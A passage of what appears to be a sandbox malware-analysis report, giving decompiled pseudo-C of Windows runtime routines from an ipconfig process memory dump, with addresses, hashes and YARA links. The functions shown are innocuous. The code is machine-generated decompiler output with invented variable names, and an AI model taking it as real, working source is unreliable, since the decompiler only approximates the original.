				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E02EB7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















              0x02f68ed6
              0x02f68ee5
              0x02f68eed
              0x02f68ef0
              0x02f68efa
              0x02f68f03
              0x02f68f0c
              0x02f68f15
              0x02f68f24
              0x02f68f27
              0x02f68f31
              0x02f68f43
              0x02f68f33
              0x02f68f3c
              0x02f68f3c
              0x02f68f4e
              0x02f68f4f
              0x02f68f51
              0x02f68f56
              0x02f68f69

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a9ff6112b6f5a6a4ac9cc2b87ce4b44d0bba9018081f2aba28d8ad7f4ac6c3d
              • Instruction ID: c77e0a97e743b6b38e1d0e097e30bb9313f6d8c933bf1bd51524699cec655c00
              • Opcode Fuzzy Hash: 6a9ff6112b6f5a6a4ac9cc2b87ce4b44d0bba9018081f2aba28d8ad7f4ac6c3d
              • Instruction Fuzzy Hash: 47112171E402199FDB04DFA8D445BAEF7F4FF08340F0482AAE518EB782E6349941CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9DB60 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02E9DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E02E9DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E02E9E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L02E9E8B0(__ecx, _t14, 0xfff);
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







              0x02e9db64
              0x02e9db66
              0x02e9db6b
              0x02e9dbaa
              0x02e9db71
              0x02e9db76
              0x02e9db7a
              0x02e9dba3
              0x02e9db7c
              0x02e9db87
              0x02e9db8b
              0x02ef4fa1
              0x02ef4fb3
              0x02ef4fb8
              0x02e9db91
              0x02e9db96
              0x02e9db98
              0x02e9db98
              0x02e9db8b
              0x02e9db7a
              0x02e9db9d
              0x02e9dba2

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction ID: 86a1a594f55f78df391e442f53a301d91319d2de83554bf8aed6fc5d5ab1b31a
              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction Fuzzy Hash: 7DF0FC332C15729BDB327A958CA4FA7B6968FC1B64F1A9037F3059B744DA708C02C6D1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9B1E1 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02E9B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E02EB7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E02EB7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E02F17016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






              0x02e9b1e8
              0x02e9b1ea
              0x02e9b1f3
              0x02ef4a17
              0x02e9b1f9
              0x02e9b1f9
              0x02e9b1f9
              0x02e9b201
              0x02ef4a21
              0x02ef4a2e
              0x00000000
              0x00000000
              0x02ef4a3b
              0x02ef4a4d
              0x02ef4a3d
              0x02ef4a46
              0x02ef4a46
              0x02ef4a55
              0x00000000
              0x00000000
              0x00000000
              0x02e9b20a
              0x02e9b20a
              0x02e9b20a
              0x02e9b20a

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction ID: 2a59368b5a966c8e1210d9959a0222ed1af0d1c1032802913e9e6b4131b96b44
              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction Fuzzy Hash: 1D01FE326806809BDB23975DD804F96BB99EF8275CF08D066FB14876F1E774C800D714
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F2FE87 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              C-Code - Quality: 46%
              			E02F2FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x2f8d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E02EB7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















              0x02f2fe96
              0x02f2fe9e
              0x02f2fea1
              0x02f2fead
              0x02f2feb3
              0x02f2feb9
              0x02f2fec3
              0x02f2fed5
              0x02f2fec5
              0x02f2fece
              0x02f2fece
              0x02f2fee0
              0x02f2fee1
              0x02f2fee3
              0x02f2fee8
              0x02f2fefb

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee0d73f34471cdb9baf83825c784824d1910b7875d3b968b496e85dfdd28dd37
              • Instruction ID: 5225667d4b6923393e309495df995a3239ef169009fe49fb1d08bcedae1592da
              • Opcode Fuzzy Hash: ee0d73f34471cdb9baf83825c784824d1910b7875d3b968b496e85dfdd28dd37
              • Instruction Fuzzy Hash: 0F016271A4021CAFCB14DFA8D541A6EB7F4EF05304F104559B518DB382D635D902CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F5131B Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E02F5131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2f8d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E02EB7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















              0x02f5131b
              0x02f5132a
              0x02f51330
              0x02f51336
              0x02f5133e
              0x02f51341
              0x02f51344
              0x02f5134f
              0x02f51361
              0x02f51351
              0x02f5135a
              0x02f5135a
              0x02f5136c
              0x02f5136d
              0x02f5136f
              0x02f51374
              0x02f51387

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a8c9c478885d8ba25695bb143666e641fe20da609e2216bf7bbc72ad7a47802
              • Instruction ID: 742dbee196a1096697e616e6aa1bd1c61a41f0431c6b08b3dbaa030445a28a7d
              • Opcode Fuzzy Hash: 6a8c9c478885d8ba25695bb143666e641fe20da609e2216bf7bbc72ad7a47802
              • Instruction Fuzzy Hash: 61013C71E4121CAFDB04EFA9D945AAEB7F4FF48740F008069BD05EB381E634AA00CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F68F6A Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E02F68F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2f8d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E02EB7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















              0x02f68f6a
              0x02f68f79
              0x02f68f81
              0x02f68f84
              0x02f68f8b
              0x02f68f91
              0x02f68f94
              0x02f68f9e
              0x02f68fb0
              0x02f68fa0
              0x02f68fa9
              0x02f68fa9
              0x02f68fbb
              0x02f68fbc
              0x02f68fbe
              0x02f68fc3
              0x02f68fd6

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ba565dbff82612cfe9fcf5a72a5dc9bb6a7f2258c63fdb3f2cb5e3bd788ed66
              • Instruction ID: 3458b8f2a701ba150140eddb0db16f0ca763fdb5616db76fbcddec2b2ca17ab8
              • Opcode Fuzzy Hash: 1ba565dbff82612cfe9fcf5a72a5dc9bb6a7f2258c63fdb3f2cb5e3bd788ed66
              • Instruction Fuzzy Hash: 37013C75A4020CAFDB00EFB8D945AAEB7B5EF49340F108459F905EB381EA74DA00CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F51608 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              C-Code - Quality: 46%
              			E02F51608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x2f8d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E02EB7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














              0x02f51608
              0x02f51617
              0x02f5161d
              0x02f51625
              0x02f51628
              0x02f5162b
              0x02f51636
              0x02f51648
              0x02f51638
              0x02f51641
              0x02f51641
              0x02f51653
              0x02f51654
              0x02f51656
              0x02f5165b
              0x02f5166e

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af4ca0ace97d51f2464219de60ade305144ecbe2a5b02ea9ddeeba9f6301e966
              • Instruction ID: 0ac036c356a4d38672eff263d7356beae3e1fd5e5ccf9637d9050e1f1fcf93fc
              • Opcode Fuzzy Hash: af4ca0ace97d51f2464219de60ade305144ecbe2a5b02ea9ddeeba9f6301e966
              • Instruction Fuzzy Hash: 9FF06271E44658EFDB04DFA8D845EAFB7F4EF04340F048059BA15EB381E6749910CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EBC577 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EBC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02EBC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2e711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E02F688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









              0x02ebc577
              0x02ebc57d
              0x02ebc581
              0x02ebc5b5
              0x02ebc5b9
              0x02ebc5ce
              0x02ebc5ce
              0x02ebc5ca
              0x00000000
              0x02ebc5ca
              0x02ebc5c4
              0x02ebc5c8
              0x00000000
              0x00000000
              0x00000000
              0x02ebc5ad
              0x00000000
              0x02ebc5af

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4e7c4005cf31c1b54deaf6ee0a178caceb51922ef8060e856e21375289a4b135
              • Instruction ID: 5c937b0ec5fef5bd21c4ed25e1abddeeea5f14c3e0b3061c3b399e8780fe991a
              • Opcode Fuzzy Hash: 4e7c4005cf31c1b54deaf6ee0a178caceb51922ef8060e856e21375289a4b135
              • Instruction Fuzzy Hash: 3EF090B299F6909ED7338B248044BE37BD49F05678F64F467D60587141C7A4D880C650
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED927A Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E02ED927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E02EDFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E02ED92C6(_t11, _t14);
				}
				return _t11;
			}





              0x02ed9295
              0x02ed9299
              0x02ed929f
              0x02ed92aa
              0x02ed92ad
              0x02ed92ae
              0x02ed92af
              0x02ed92b0
              0x02ed92b4
              0x02ed92bb
              0x02ed92bb
              0x02ed92c5

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
              • Instruction ID: 9bf7e85e223050fb686f7ef3c8e3068996f498a8daf2e21259a5bcd3d483e511
              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
              • Instruction Fuzzy Hash: 90E09B323805406BD7119E55DC84F57776EDF82725F049079F5045E293C6F6DD098BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F52073 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E02F52073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E02F4FD22(__ecx);
				_t19 =  *0x2f8849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x2f88748; // 0x0
					if(__eflags <= 0) {
						E02F51C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x2f88724 & 0x00000004;
							if(( *0x2f88724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x2f88724; // 0x0
					return E02F48DF1(__ebx, 0xc0000374, 0x2f85890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







              0x02f52076
              0x02f52078
              0x02f5207d
              0x02f52083
              0x02f520a4
              0x02f520aa
              0x02f520ac
              0x02f520b7
              0x02f520ba
              0x02f520bc
              0x02f520c9
              0x02f520c9
              0x02f520d0
              0x02f520d2
              0x00000000
              0x02f520d2
              0x02f520be
              0x02f520c3
              0x02f520c5
              0x02f520c7
              0x00000000
              0x00000000
              0x02f520c7
              0x02f520bc
              0x02f520d4
              0x02f52085
              0x02f52085
              0x02f520a3
              0x02f520a3

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07f88f9efbb0423599dfe6cd9d9ad4127ca27b8ed25e2ce713f744b498843c41
              • Instruction ID: 7fade3303131b3e3a72381b2469a6da9f6f2e989612778b3f2f4fc7e9e96171d
              • Opcode Fuzzy Hash: 07f88f9efbb0423599dfe6cd9d9ad4127ca27b8ed25e2ce713f744b498843c41
              • Instruction Fuzzy Hash: FAF02727C531AC4BDE366B242D043E6FFA1CF456D0F4A0941DF5117208CB348893CE10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F68D34 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 43%
              			E02F68D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x2f8d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E02EB7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













              0x02f68d34
              0x02f68d43
              0x02f68d4b
              0x02f68d4e
              0x02f68d52
              0x02f68d5c
              0x02f68d6e
              0x02f68d5e
              0x02f68d67
              0x02f68d67
              0x02f68d79
              0x02f68d7a
              0x02f68d7c
              0x02f68d81
              0x02f68d94

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8bf83a03faaf077af18d41b9feedb938130525866d82fb711acda3e55f7f1cc
              • Instruction ID: 21a2805d8ad614e2dd08b755b11b5366ead7065eecfb04e5d11a2fa3a483ba59
              • Opcode Fuzzy Hash: b8bf83a03faaf077af18d41b9feedb938130525866d82fb711acda3e55f7f1cc
              • Instruction Fuzzy Hash: 70F0BE71E4460CAFDB04EFB8D845ABEB7B4EF08340F108499F906EB281EA34D900CB64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F68B58 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 36%
              			E02F68B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2f8d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E02EB7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













              0x02f68b67
              0x02f68b6f
              0x02f68b72
              0x02f68b7d
              0x02f68b8f
              0x02f68b7f
              0x02f68b88
              0x02f68b88
              0x02f68b9a
              0x02f68b9b
              0x02f68b9d
              0x02f68ba2
              0x02f68bb5

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7728adb485d6e8923fa58aea3ae0c405260ab9a991786e06617f5f8b5e10d9e6
              • Instruction ID: 1edc445d03bb6af2e89974f3d5c91ed13ead371d93b455de9c2a48ee2d08633e
              • Opcode Fuzzy Hash: 7728adb485d6e8923fa58aea3ae0c405260ab9a991786e06617f5f8b5e10d9e6
              • Instruction Fuzzy Hash: 2AF082B1A54259AFDB10EBB8D906E7EB3B4EF04344F04445DBA15DB3C1EA74D900CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E94F2E Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02E94F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E02F688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E02EBC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2e71030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









              0x02e94f2e
              0x02e94f34
              0x02e94f38
              0x02ef0b85
              0x02ef0b85
              0x02ef0b89
              0x02ef0b9a
              0x02ef0b9a
              0x02ef0b9f
              0x00000000
              0x02ef0b9f
              0x02ef0b94
              0x02ef0b98
              0x00000000
              0x00000000
              0x00000000
              0x02ef0b98
              0x02e94f3e
              0x02e94f48
              0x00000000
              0x02e94f6e
              0x00000000
              0x02e94f70

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9eae1a30251c71ae8d2b01f25d98f3c7061a88498e980923f58be3d68a088767
              • Instruction ID: 77562260df9fdca7c9a7f77600f061f67df646907207fbdc712571118c84bf60
              • Opcode Fuzzy Hash: 9eae1a30251c71ae8d2b01f25d98f3c7061a88498e980923f58be3d68a088767
              • Instruction Fuzzy Hash: 15F0E2325AA7848FDBB1C728C164F22B7D4EF007BCF04F465D50587926E724ED45C640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F68CD6 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 36%
              			E02F68CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
